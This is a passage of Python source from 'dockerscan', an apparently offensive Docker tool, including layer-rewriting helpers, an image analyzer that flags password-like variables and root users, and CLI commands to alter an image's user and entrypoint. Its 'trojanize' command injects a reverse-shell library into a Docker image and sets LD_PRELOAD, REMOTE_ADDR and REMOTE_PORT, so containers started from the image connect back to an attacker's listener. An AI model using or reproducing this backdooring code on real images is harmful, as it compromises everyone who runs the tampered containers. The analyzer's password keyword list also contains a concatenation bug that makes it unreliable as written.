338 | new_manifest = build_manifest_with_new_layer(manifest,
339 | old_layer_digest,
340 | new_layer_digest)
341 |
342 | # 4 - Create new docker image
343 | create_new_docker_image(new_manifest,
344 | tmp_out_image.name,
345 | img,
346 | old_layer_digest,
347 | new_layer_path,
348 | new_layer_digest)
349 |
350 | # Replace old image with the new
351 | shutil.copy(tmp_out_image.name,
352 | image_path)
353 |
354 |
355 | def _update_json_values(update_points: list,
356 | values: Union[dict, str]):
357 |
358 | for point in update_points:
359 | if isinstance(values, dict):
360 | for var_name, var_value in values.items():
361 | point.append("{}={}".format(
362 | var_name,
363 | var_value
364 | ))
365 | elif isinstance(values, (str, bytes)):
366 | if hasattr(values, "decode"):
367 | values = values.decode()
368 | setattr(point, values)
369 |
370 |
371 | def update_layer_environment_vars(json_info: dict,
372 | new_environment_vars: dict) -> dict:
373 |
374 | new_json_info = json_info.copy()
375 |
376 | update_points = [
377 | new_json_info["config"]["Env"],
378 | new_json_info["container_config"]["Env"]
379 | ]
380 |
381 | for point in update_points:
382 | for var_name, var_value in new_environment_vars.items():
383 | point.append("{}={}".format(
384 | var_name,
385 | var_value
386 | ))
387 |
388 | return new_json_info
389 |
390 |
391 | def update_layer_user(json_info: dict,
392 | new_user: str) -> dict:
393 |
394 | new_json_info = json_info.copy()
395 |
396 | update_points = [
397 | new_json_info["config"],
398 | new_json_info["container_config"]
399 | ]
400 |
401 | for point in update_points:
402 | point["User"] = new_user
403 |
404 | return new_json_info
405 |
406 |
407 | def update_layer_entry_point(json_info: dict,
408 | new_cmd: str) -> dict:
409 |
410 | new_json_info = json_info.copy()
411 |
412 | update_points = [
413 | new_json_info["config"],
414 | new_json_info["container_config"]
415 | ]
416 |
417 | for point in update_points:
418 | point["Entrypoint"] = new_cmd
419 |
420 | return new_json_info
421 |
422 |
423 | def create_new_docker_image(manifest: dict,
424 | image_output_path: str,
425 | img: tarfile.TarFile,
426 | old_layer_digest: str,
427 | new_layer_path: str,
428 | new_layer_digest: str,
429 | json_metadata_last_layer: dict = None,
430 | json_metadata_root: dict = None):
431 | with tarfile.open(image_output_path, "w") as s:
432 |
433 | for f in img.getmembers():
434 | log.debug(" _> Processing file: {}".format(f.name))
435 |
436 | # Add new manifest
437 | if f.name == "manifest.json":
438 | # Dump Manifest to JSON
439 | new_manifest_json = json.dumps(manifest).encode()
440 | replace_or_append_file_to_layer("manifest.json",
441 | new_manifest_json,
442 | s)
443 |
444 | #
445 | # NEW LAYER INFO
446 | #
447 | elif old_layer_digest in f.name:
448 | # Skip for old layer.tar file
449 | if f.name == "{}/layer.tar".format(old_layer_digest) or \
450 | "/" not in f.name:
451 |
452 | log.debug(
453 | " _> Replacing layer {} by {}".format(
454 | f.name,
455 | new_layer_digest
456 | ))
457 |
458 | replace_or_append_file_to_layer("{}/layer.tar".format(
459 | new_layer_digest),
460 | new_layer_path,
461 | s)
462 | else:
463 | #
464 | # Extra files: "json" and "VERSION"
465 | #
466 | c = read_file_from_image(img, f.name)
467 |
468 | if "json" in f.name:
469 | # Modify the JSON content to add the new
470 | # hash
471 | if json_metadata_last_layer:
472 | c = json.dumps(json_metadata_last_layer).encode()
473 | else:
474 | c = c.decode().replace(old_layer_digest,
475 | new_layer_digest).encode()
476 |
477 | replace_or_append_file_to_layer("{}/{}".format(
478 | new_layer_digest,
479 | os.path.basename(f.name)), c, s)
480 |
481 | #
482 | # Root .json file with the global info
483 | #
484 | elif "repositories" in f.name:
485 | c = read_file_from_image(img, f, autoclose=False)
486 | j = json.loads(c.decode())
487 |
488 | image = list(j.keys())[0]
489 | tag = list(j[image].keys())[0]
490 |
491 | # Update the latest layer
492 | j[image][tag] = new_layer_digest
493 |
494 | new_c = json.dumps(j).encode()
495 |
496 | replace_or_append_file_to_layer(f.name, new_c, s)
497 |
498 | elif ".json" in f.name and "/" not in f.name:
499 | c = read_file_from_image(img, f, autoclose=False)
500 |
501 | # Modify the JSON content to add the new
502 | # hash
503 | if json_metadata_root:
504 | j = json_metadata_root
505 | else:
506 | j = json.loads(c.decode())
507 |
508 | j["rootfs"]["diff_ids"][-1] = \
509 | "sha256:{}".format(new_layer_digest)
510 |
511 | new_c = json.dumps(j).encode()
512 |
513 | replace_or_append_file_to_layer(f.name, new_c, s)
514 |
515 | # Add the rest of files / dirs
516 | else:
517 | s.addfile(f, img.extractfile(f))
518 |
519 |
520 | def get_root_json_from_image(img: tarfile.TarFile) -> Tuple[str, dict]:
521 | """
522 | Every docker image has a root .json file with the metadata information.
523 | this function locate this file, load it and return the value of it and
524 | their name
525 |
526 | >>> get_docker_image_layers(img)
527 | ('db079554b4d2f7c65c4df3adae88cb72d051c8c3b8613eb44e86f60c945b1ca7', dict(...))
528 | """
529 | for f in img.getmembers():
530 | if f.name.endswith("json") and "/" not in f.name:
531 | c = img.extractfile(f.name).read()
532 | if hasattr(c, "decode"):
533 | c = c.decode()
534 |
535 | return f.name.split(".")[0], json.loads(c)
536 |
537 | return None, None
538 |
539 |
540 | def get_file_path_from_img(image_content_dir: str,
541 | image_file_path: str) -> str:
542 |
543 | if image_file_path.startswith("/"):
544 | image_file_path = image_file_path[1:]
545 |
546 | return os.path.join(image_content_dir, image_file_path)
547 |
548 |
549 | def copy_file_to_image_folder(image_content_dir: str,
550 | src_file: str,
551 | dst_file: str) -> str:
552 |
553 | if dst_file.startswith("/"):
554 | dst_file = dst_file[1:]
555 |
556 | remote_path = os.path.join(image_content_dir, dst_file)
557 | remote_dir = os.path.dirname(remote_path)
558 |
559 | if not os.path.exists(remote_dir):
560 | os.makedirs(remote_dir)
561 |
562 | shutil.copy(src_file,
563 | remote_path)
564 |
565 |
566 | def get_layers_ids_from_manifest(manifest: dict) -> List[str]:
567 | try:
568 | return [x.split("/")[0] for x in manifest[0]["Layers"]]
569 |
570 | except (IndexError, KeyError):
571 | raise DockerscanError("Invalid manifest")
572 |
573 |
574 | def extract_docker_layer(img: tarfile.TarFile,
575 | layer_id: str,
576 | extract_path: str):
577 | with tarfile.open(fileobj=img.extractfile('%s/layer.tar' % layer_id),
578 | errorlevel=0,
579 | dereference=True) as layer:
580 |
581 | layer.extractall(path=extract_path)
582 |
583 | log.debug('processing whiteouts')
584 | for member in layer.getmembers():
585 | path = member.path
586 | if path.startswith('.wh.') or '/.wh.' in path:
587 | if path.startswith('.wh.'):
588 | newpath = path[4:]
589 | else:
590 | newpath = path.replace('/.wh.', '/')
591 |
592 | try:
593 | log.debug('removing path %s', newpath)
594 | os.unlink(path)
595 | os.unlink(newpath)
596 | except OSError as err:
597 | if err.errno != errno.ENOENT:
598 | raise
599 |
600 |
601 | def extract_docker_image(image_path: str,
602 | extract_path: str):
603 | """Extract a docker image content to a path location"""
604 | if not os.path.exists(image_path):
605 | raise DockerscanNotExitsError("Docker image not exits at path: {}". \
606 | format(image_path))
607 |
608 | with open_docker_image(image_path) as (img, first_layer, _, _):
609 | layers = list(_find_layers(img, first_layer))
610 |
611 | if not os.path.isdir(extract_path):
612 | os.makedirs(extract_path)
613 |
614 | for layer_id in reversed(layers):
615 | log.debug('extracting layer %s', layer_id)
616 |
617 | extract_docker_layer(img, layer_id, extract_path)
618 |
619 |
620 | def resolve_text_var_from_metadata_vars(text: str,
621 | image_metadata: dict) -> str:
622 | if "$" not in text:
623 | return text
624 |
625 | # Extract var name
626 | REGEX_EXTRACT_ENV_VAR = re.compile(r'''(\$[{]*[\w]+[}]*)''')
627 | REGEX_EXTRACT_ENV_VAR_NAME = re.compile(r'''(\$[{]*)([\w]+)([}]*)''')
628 |
629 | var_name_mark = REGEX_EXTRACT_ENV_VAR.search(text).group(1)
630 | var_name = REGEX_EXTRACT_ENV_VAR_NAME.search(var_name_mark).group(2)
631 |
632 | # Get image metadata vars
633 | image_metadata_environ = set()
634 | image_metadata_environ.update(image_metadata["config"]["Env"])
635 | image_metadata_environ.update(image_metadata["container_config"]["Env"])
636 |
637 | # Search in environment vars
638 | for env in image_metadata_environ:
639 | env_name, env_value = env.split("=", maxsplit=1)
640 |
641 | if var_name in env_name:
642 | text = text.replace(var_name_mark,
643 | env_value)
644 | break
645 |
646 | return text
647 |
648 |
649 | def get_entry_point_from_image_metadata(image_metadata: dict) -> str:
650 | # Build the launching command
651 | entrypoint = image_metadata["config"]["Entrypoint"]
652 |
653 | if type(entrypoint) is list:
654 | entrypoint = " ".join(entrypoint)
655 |
656 | # Locate the entry-point
657 | cmd = image_metadata["config"]["Cmd"]
658 | if type(cmd) is list:
659 | cmd = " ".join(cmd)
660 |
661 | if entrypoint and cmd:
662 | start_point = "{} {}".format(entrypoint, cmd)
663 | elif entrypoint and not cmd:
664 | start_point = entrypoint
665 | elif not entrypoint and cmd:
666 | start_point = cmd
667 | else:
668 | start_point = ""
669 |
670 | raw_start_point = start_point.strip()
671 |
672 | # replace environment vars, like ${HOME} in entry point
673 | return resolve_text_var_from_metadata_vars(raw_start_point,
674 | image_metadata)
675 |
676 |
677 | def get_docker_image_layers(image_path: str) -> dict:
678 | """
679 | This function get a docker image layers and yield them
680 |
681 | >>> for x in get_docker_image_layers("/path/image.tar"):
682 | print(x)
683 | """
684 | with open_docker_image(image_path) as (img, top_layers, _, _):
685 | layers_meta = _find_metadata_in_layers(img, top_layers)
686 |
687 | for layer in layers_meta:
688 | yield layer
689 |
690 |
691 | __all__ = ("open_docker_image", "extract_layer_in_tmp_dir",
692 | "get_last_image_layer", "get_docker_image_layers",
693 | "build_image_layer_from_dir", "build_manifest_with_new_layer",
694 | "get_file_path_from_img", "copy_file_to_image_folder",
695 | "extract_docker_image", "extract_docker_layer",
696 | "create_new_docker_image",
697 | "extract_docker_layer", "get_layers_ids_from_manifest",
698 | "update_layer_environment_vars", "get_root_json_from_image",
699 | "read_file_from_image", "update_layer_user",
700 | "modify_docker_image_metadata",
701 | "get_entry_point_from_image_metadata",
702 | "resolve_text_var_from_metadata_vars",
703 | "replace_or_append_file_to_layer",
704 | "update_layer_entry_point",
705 | "add_new_file_to_image")
--------------------------------------------------------------------------------
/dockerscan/actions/image/image_analyzer.py:
--------------------------------------------------------------------------------
1 | import re
2 | import string
3 |
4 | from collections import defaultdict
5 |
6 | from .model import DockerImageInfo
7 |
8 | PASSWORD_KEYWORDS = (
9 | "pwd",
10 | "passwd"
11 | "password"
12 | "cred",
13 | "credential"
14 | "auth"
15 | )
16 |
17 | REGEX_URN = re.compile('[a-z\-]{0,6}://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
18 | REGEX_IPV6 = re.compile(r'''(\A([0-9a-f]{1,4}:){1,1}(:[0-9a-f]{1,4}){1,6}\Z)|(\A([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}\Z)|(\A([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}\Z)|(\A([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}\Z)|(\A([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}\Z)|(\A([0-9a-f]{1,4}:){1,6}(:[0-9a-f]{1,4}){1,1}\Z)|(\A(([0-9a-f]{1,4}:){1,7}|:):\Z)|(\A:(:[0-9a-f]{1,4}){1,7}\Z)|(\A((([0-9a-f]{1,4}:){6})(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3})\Z)|(\A(([0-9a-f]{1,4}:){5}[0-9a-f]{1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3})\Z)|(\A([0-9a-f]{1,4}:){5}:[0-9a-f]{1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,1}(:[0-9a-f]{1,4}){1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,3}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,2}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,1}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A(([0-9a-f]{1,4}:){1,5}|:):(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A:(:[0-9a-f]{1,4}){1,5}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)''')
19 | REGEX_IPV4 = re.compile(r'''((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([
20 | 0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])) ''')
21 | REGEX_EXTRACT_ENV_VAR = re.compile(r'''(\$[{]*[\w]+[}]*)''')
22 | REGEX_EXTRACT_ENV_VAR_NAME = re.compile(r'''(\$[{]*)([\w]+)([}]*)''')
23 |
24 |
25 | class DockerImageAnalysisResults:
26 | PASSWORD = "password"
27 | URN = "URL-IP"
28 |
29 | def __init__(self):
30 | self.running_user = ""
31 | self.sensitive_data = defaultdict(dict)
32 | self.warnings = defaultdict(set)
33 |
34 | def add_user(self, user_name):
35 | # if image_info.user == "" or image_info.working_dir == "/root":
36 | # results.add_user("root")
37 | if not self.running_user:
38 | self.running_user = user_name
39 | elif self.running_user != "root" and user_name != "root":
40 | self.running_user = user_name
41 |
42 | def add_sensitive(self, sensitive_data_type, location, data):
43 | assert sensitive_data_type in (self.PASSWORD, self.URN)
44 |
45 | try:
46 | d = self.sensitive_data[sensitive_data_type][location]
47 | d.add(data)
48 | except KeyError:
49 | self.sensitive_data[sensitive_data_type][location] = set()
50 | self.sensitive_data[sensitive_data_type][location].add(data)
51 |
52 | def add_warning(self, location, message):
53 | self.warnings[location].add(message)
54 |
55 |
56 | def _replace_bash_vars_in_string(text: str, image_metadata: list) -> str:
57 | # Extract var name
58 | var_name_mark = REGEX_EXTRACT_ENV_VAR.search(text).group(1)
59 | var_name = REGEX_EXTRACT_ENV_VAR_NAME.search(var_name_mark).group(2)
60 |
61 | # Search in environment vars
62 | for env in image_metadata:
63 | env_name, env_value = env.split("=", maxsplit=1)
64 |
65 | if var_name in env_name:
66 | text = text.replace(var_name_mark,
67 | env_value)
68 | break
69 | return text
70 |
71 |
72 | # --------------------------------------------------------------------------
73 | # Content helpers function
74 | # --------------------------------------------------------------------------
75 | def _build_start_point(image_metadata) -> str:
76 | # Build the launching command
77 | entrypoint = image_metadata.entry_point
78 |
79 | if type(entrypoint) is list:
80 | entrypoint = " ".join(entrypoint)
81 |
82 | # Locate the entry-point
83 | cmd = image_metadata.cmd
84 | if image_metadata.cmd:
85 | if type(image_metadata.cmd) is list:
86 | cmd = " ".join(image_metadata.cmd)
87 |
88 | if entrypoint and cmd:
89 | start_point = "{} {}".format(entrypoint, cmd)
90 | elif entrypoint and not cmd:
91 | start_point = entrypoint
92 | elif not entrypoint and cmd:
93 | start_point = cmd
94 | else:
95 | start_point = ""
96 |
97 | return start_point.strip()
98 |
99 |
100 | def _find_user_in_start_point(image_location: str,
101 | start_point: str,
102 | image_metadata: DockerImageInfo) -> str:
103 | launch_command = start_point
104 |
105 | is_binary = False
106 | # If start point is a shell script, then open it
107 | if launch_command.endswith("sh"):
108 | _shell_path = start_point[start_point.rfind(" ") + 1:]
109 | _shell_location = "{}/{}".format(image_location,
110 | _shell_path)
111 |
112 | # Clean
113 | _shell_location = _shell_location.replace("//", "/")
114 |
115 | # If command has any environment var -> replace it
116 | if "$" in _shell_location:
117 | _shell_location = _replace_bash_vars_in_string(
118 | _shell_location,
119 | image_metadata.environment)
120 |
121 | # Clean
122 | _shell_location = _shell_location.replace("//", "/")
123 |
124 | # Check if _shell is a binary file
125 | is_binary = open(_shell_location,
126 | "r",
127 | errors="ignore").read(1) in string.printable
128 | if not is_binary:
129 | launch_command = open(_shell_location, "r", errors="ignore").read()
130 |
131 | #
132 | # Try to find "sudo" or "gosu" or "su -c '...'"
133 | #
134 | SUDO_PATTERNS = ("sudo", "gosu", "su -c")
135 | if not is_binary:
136 | for pattern in SUDO_PATTERNS:
137 | if pattern in launch_command:
138 | return "non-root"
139 | else:
140 | return "root"
141 | else:
142 | return "root"
143 |
144 |
145 | def _find_domains_and_ips_in_text(text) -> str:
146 | ipv4 = REGEX_IPV4.search(text)
147 | if ipv4:
148 | return text[ipv4.start():ipv4.end()]
149 |
150 | ipv6 = REGEX_IPV6.search(text)
151 | if ipv6:
152 | return text[ipv6.start():ipv6.end()]
153 |
154 | urn = REGEX_URN.search(text)
155 | if urn:
156 | return text[urn.start():urn.end()]
157 |
158 | return ""
159 |
160 |
161 | def _find_password_in_text(text):
162 | for k in PASSWORD_KEYWORDS:
163 | if k in text:
164 | return True
165 | return False
166 |
167 |
168 | # --------------------------------------------------------------------------
169 | # Public API
170 | # --------------------------------------------------------------------------
171 | def search_in_metadata(image_info: DockerImageInfo,
172 | results: DockerImageAnalysisResults):
173 | """
174 | Search sensitive information in metadata:
175 |
176 | - Passwords in environments vars
177 | - Detect root user running
178 | - Excessive port exposed
179 | """
180 |
181 | # Try to find passwords in vars environments
182 | for env in image_info.environment:
183 | if _find_password_in_text(env):
184 | results.add_sensitive(DockerImageAnalysisResults.PASSWORD,
185 | "environment_var",
186 | env)
187 |
188 | urn = _find_domains_and_ips_in_text(env)
189 | if urn:
190 | results.add_sensitive(DockerImageAnalysisResults.URN,
191 | "environment_var",
192 | urn)
193 |
194 | # Try to check if root is running as root
195 | if image_info.user:
196 | results.add_user(image_info.user)
197 |
198 | # Many ports exposed?
199 | if len(image_info.exposed_ports) > 4:
200 | results.add_warning("exposed_ports",
201 | "Docker image has more thant 4 ports are exposed")
202 |
203 |
204 | def search_in_content(image_location: str,
205 | image_metadata: DockerImageInfo,
206 | results: DockerImageAnalysisResults):
207 |
208 | start_point = _build_start_point(image_metadata)
209 |
210 | user = _find_user_in_start_point(image_location,
211 | start_point,
212 | image_metadata)
213 |
214 | results.add_user(user)
215 |
216 |
217 | def analyze_docker_image(image_extracted_location: str,
218 | image_info: DockerImageInfo) -> \
219 | DockerImageAnalysisResults:
220 |
221 | results = DockerImageAnalysisResults()
222 |
223 | # Search in metadata
224 | search_in_metadata(image_info, results)
225 |
226 | # Search in content
227 | search_in_content(image_extracted_location,
228 | image_info,
229 | results)
230 |
231 | return results
232 |
233 |
234 | __all__ = ("analyze_docker_image", "search_in_content", "search_in_metadata")
235 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/model.py:
--------------------------------------------------------------------------------
1 | from collections import defaultdict
2 |
3 | from dockerscan import SharedConfig, String
4 |
5 |
6 | class DockerImageInfoModel(SharedConfig):
7 | image_path = String()
8 |
9 |
10 | class DockerImageAnalyzeModel(SharedConfig):
11 | image_path = String()
12 |
13 |
14 | class DockerImageExtractModel(SharedConfig):
15 | image_path = String()
16 | extract_path = String()
17 |
18 |
19 | class DockerImageInfo:
20 |
21 | def __init__(self):
22 | self.author = ""
23 | self.host_name = ""
24 | self.entry_point = ""
25 | self.working_dir = ""
26 | self.created_date = ""
27 | self.docker_version = ""
28 | self.cmd = ""
29 | self.labels = []
30 | self.environment = []
31 | self.user = ""
32 |
33 | #: dict - { PORT_NO: ["TCP", "UDP"]}
34 | #: dict - { PORT_NO: ["TCP"]}
35 | self.exposed_ports = defaultdict(set)
36 |
37 | def add_layer_info(self, layer_info: dict):
38 | # Get container config
39 | # container_config = layer_info.get("container_config", None)
40 | container_config = layer_info.get("config", None)
41 |
42 | if container_config:
43 | basic_info = {
44 | "Hostname": "host_name",
45 | "WorkingDir": "working_dir",
46 | "Entrypoint": "entry_point",
47 | "User": "user"
48 | }
49 | list_info = {
50 | "Env": "environment",
51 | "Labels": "labels"
52 | }
53 |
54 | for json_prop, class_prop in basic_info.items():
55 | json_value = container_config.get(json_prop)
56 | if json_value:
57 | setattr(self, class_prop, json_value)
58 |
59 | for json_prop, class_prop in list_info.items():
60 | json_value = container_config.get(json_prop)
61 | if json_value:
62 | class_value = getattr(self, class_prop)
63 | class_value.extend(json_value)
64 |
65 | if container_config.get("Cmd", None):
66 | # Get only the Cmd Command of the last layer
67 | if "container" in layer_info:
68 | self.cmd = " ".join(container_config.get("Cmd"))
69 |
70 | # Add exposed ports
71 | if container_config.get("ExposedPorts"):
72 | for port in container_config.get("ExposedPorts").keys():
73 | port, proto = port.split("/")
74 |
75 | self.exposed_ports[port].add(proto)
76 |
77 | # Only storage the date for the last layer. And only the last layer
78 | # contains "container" property
79 | if layer_info.get("container", None):
80 | self.created_date = layer_info.get("created")
81 |
82 | if layer_info.get("author"):
83 | self.author = layer_info.get("author")
84 |
85 | if layer_info.get("docker_version"):
86 | self.docker_version = layer_info.get("docker_version")
87 |
88 |
89 | __all__ = ("DockerImageInfoModel", "DockerImageInfo",
90 | "DockerImageExtractModel", "DockerImageAnalyzeModel",)
91 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/api.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os.path
3 | import logging
4 | from contextlib import contextmanager
5 |
6 | from dockerscan import DockerscanReturnContextManager
7 | from .model import *
8 | from ..docker_api import *
9 |
10 | log = logging.getLogger("dockerscan")
11 |
12 | REMOTE_SHELL_PATH = "/usr/share/lib/reverse_shell.so"
13 |
14 |
15 | def run_image_modify_trojanize_dockerscan(
16 | config: DockerImageInfoModifyTrojanizeModel):
17 |
18 | assert isinstance(config, DockerImageInfoModifyTrojanizeModel)
19 |
20 | output_docker_image = config.output_image
21 | image_path = config.image_path
22 |
23 | if not output_docker_image:
24 | output_docker_image = os.path.basename(config.image_path)
25 |
26 | if not output_docker_image.endswith("tar"):
27 | output_docker_image += ".tar"
28 |
29 | # Choice the shell
30 | if not config.custom_shell:
31 | SHELL_PATH = os.path.join(os.path.dirname(__file__),
32 | "shells",
33 | "reverse_shell.so")
34 | else:
35 | SHELL_PATH = os.path.abspath(config.custom_shell)
36 |
37 | # 1 - Get layers info
38 | log.debug(" > Opening docker file")
39 | with open_docker_image(image_path) as (
40 | img, top_layer, _, manifest):
41 |
42 | # 2 - Get the last layer in manifest
43 | old_layer_digest = get_last_image_layer(manifest)
44 | log.debug(" > Last layer: {}".format(old_layer_digest))
45 |
46 | with extract_layer_in_tmp_dir(img, old_layer_digest) as d:
47 |
48 | # Start trojanizing
49 | log.info(" > Starting trojaning process")
50 |
51 | # 3 - Copy the shell
52 | log.info(" > Coping the shell: 'reverse_shell.so' "
53 | "to '{}'".format(REMOTE_SHELL_PATH))
54 |
55 | copy_file_to_image_folder(d,
56 | SHELL_PATH,
57 | REMOTE_SHELL_PATH)
58 |
59 | new_layer_path, new_layer_digest = \
60 | build_image_layer_from_dir("new_layer.tar", d)
61 |
62 | # 5 - Updating the manifest
63 | new_manifest = build_manifest_with_new_layer(manifest,
64 | old_layer_digest,
65 | new_layer_digest)
66 |
67 | # Add new enviroment vars with LD_PRELOAD AND REMOTE ADDR
68 | json_info_last_layer = read_file_from_image(img,
69 | "{}/json".format(
70 | old_layer_digest))
71 |
72 | json_info_last_layer = json.loads(json_info_last_layer.decode())
73 |
74 | new_env_vars = {
75 | "LD_PRELOAD": REMOTE_SHELL_PATH,
76 | "REMOTE_ADDR": config.remote_addr,
77 | "REMOTE_PORT": config.remote_port
78 | }
79 |
80 | new_json_data_last_layer = update_layer_environment_vars(
81 | json_info_last_layer,
82 | new_env_vars
83 | )
84 |
85 | _, json_info_root_layer = get_root_json_from_image(img)
86 | new_json_info_root_layer = update_layer_environment_vars(
87 | json_info_root_layer,
88 | new_env_vars
89 | )
90 |
91 | # 6 - Create new docker image
92 | log.info(" > Creating new docker image")
93 | create_new_docker_image(new_manifest,
94 | output_docker_image,
95 | img,
96 | old_layer_digest,
97 | new_layer_path,
98 | new_layer_digest,
99 | new_json_data_last_layer,
100 | new_json_info_root_layer)
101 |
102 |
103 | def run_image_modify_user_dockerscan(
104 | config: DockerImageInfoModifyUserModel):
105 |
106 | assert isinstance(config, DockerImageInfoModifyUserModel)
107 |
108 | output_docker_image = config.output_image
109 | image_path = config.image_path
110 |
111 | if not output_docker_image:
112 | output_docker_image = os.path.basename(config.image_path)
113 |
114 | if not output_docker_image.endswith("tar"):
115 | output_docker_image += ".tar"
116 |
117 | with modify_docker_image_metadata(image_path,
118 | output_docker_image) as (last_layer_json,
119 | root_layer_json):
120 |
121 | new_json_data_last_layer = update_layer_user(last_layer_json,
122 | config.new_user)
123 | new_json_info_root_layer = update_layer_user(root_layer_json,
124 | config.new_user)
125 |
126 | raise DockerscanReturnContextManager(new_json_data_last_layer,
127 | new_json_info_root_layer)
128 |
129 |
130 | def run_image_modify_entry_point_dockerscan(
131 | config: DockerImageInfoModifyEntryPointModel):
132 |
133 | assert isinstance(config, DockerImageInfoModifyEntryPointModel)
134 |
135 | output_docker_image = config.output_image
136 | image_path = config.image_path
137 |
138 | if not output_docker_image:
139 | output_docker_image = os.path.basename(config.image_path)
140 |
141 | if not output_docker_image.endswith("tar"):
142 | output_docker_image += ".tar"
143 |
144 | new_entry_point = config.new_entry_point
145 |
146 | add_binary_path = config.binary_path
147 | if add_binary_path:
148 | #
149 | # Add the new file to the image
150 | #
151 | log.info(" > Adding new data to the image")
152 | add_binary_path = os.path.abspath(add_binary_path)
153 |
154 | add_new_file_to_image(add_binary_path,
155 | new_entry_point,
156 | image_path)
157 |
158 | with modify_docker_image_metadata(image_path,
159 | output_docker_image) as (last_layer_json,
160 | root_layer_json):
161 |
162 | new_json_data_last_layer = update_layer_entry_point(last_layer_json,
163 | new_entry_point)
164 | new_json_info_root_layer = update_layer_entry_point(root_layer_json,
165 | new_entry_point)
166 |
167 | raise DockerscanReturnContextManager(new_json_data_last_layer,
168 | new_json_info_root_layer)
169 |
170 |
171 | __all__ = ("run_image_modify_trojanize_dockerscan",
172 | "run_image_modify_user_dockerscan",
173 | "run_image_modify_entry_point_dockerscan")
174 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 | from dockerscan import check_console_input_config
4 |
5 | from .model import *
6 | from .console import *
7 |
8 |
9 | @click.group(help="Modify a docker image commands")
10 | @click.pass_context
11 | def modify(ctx, **kwargs):
12 | pass
13 |
14 |
15 | @modify.command(help="trojanize a Docker image")
16 | @click.pass_context
17 | @click.argument("image_path")
18 | @click.option("--listen",
19 | "-l",
20 | "remote_addr",
21 | required=True,
22 | help="remote address where to connect to on shell starts")
23 | @click.option("-p",
24 | "--port",
25 | "remote_port",
26 | default="2222",
27 | help="Remote port where to connect to on shell starts")
28 | @click.option("--output", "-o", "output_image")
29 | @click.option("--custom-shell", "-S", "custom_shell")
30 | def trojanize(ctx, **kwargs):
31 | config = DockerImageInfoModifyTrojanizeModel(**ctx.obj, **kwargs)
32 |
33 | # Check if valid
34 | if check_console_input_config(config):
35 | launch_dockerscan_image_modify_trojanize_in_console(config)
36 |
37 |
38 | @modify.command(help="change docker image global user")
39 | @click.pass_context
40 | @click.argument("image_path")
41 | @click.argument("new_user")
42 | @click.option("--output", "-o", "output_image")
43 | def user(ctx, **kwargs):
44 | config = DockerImageInfoModifyUserModel(**ctx.obj, **kwargs)
45 |
46 | # Check if valid
47 | if check_console_input_config(config):
48 | launch_dockerscan_image_modify_user_in_console(config)
49 |
50 |
51 | @modify.command(help="change docker entry point")
52 | @click.pass_context
53 | @click.argument("image_path")
54 | @click.argument("new_entry_point")
55 | @click.option("--add",
56 | "-a",
57 | "binary_path",
58 | help="binary path use instead of current entry-point")
59 | @click.option("--output", "-o", "output_image")
60 | def entrypoint(ctx, **kwargs):
61 | config = DockerImageInfoModifyEntryPointModel(**ctx.obj, **kwargs)
62 |
63 | # Check if valid
64 | if check_console_input_config(config):
65 | launch_dockerscan_image_modify_entrypoint_in_console(config)
66 |
67 | #
68 | # - Inject binary
69 | # - Inject LD_PRELOAD -> as env vars
70 | # - Add environment vars
71 | # - Replace binary
72 | #
73 |
74 | __all__ = ("modify", )
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/console.py:
--------------------------------------------------------------------------------
1 | import os
2 | import logging
3 |
4 | from dockerscan import get_log_level, run_in_console
5 |
6 | from .api import *
7 | from .model import *
8 |
9 | log = logging.getLogger('dockerscan')
10 |
11 |
12 | def launch_dockerscan_image_modify_trojanize_in_console(
13 | config: DockerImageInfoModifyTrojanizeModel):
14 | """Launch in console mode"""
15 |
16 | log.setLevel(get_log_level(config.verbosity))
17 |
18 | with run_in_console(config.debug):
19 |
20 | log.console("Starting analyzing docker image...")
21 | log.console("Selected image: '{}'".format(
22 | os.path.basename(config.image_path)))
23 |
24 | run_image_modify_trojanize_dockerscan(config)
25 |
26 | log.console("Image trojanized successfully")
27 | log.console("Trojanized image location:")
28 | log.console(" > {}".format(
29 | "{}.tar".format(os.path.abspath(config.output_image))
30 | if config.output_image else
31 | "{}.tar".format(
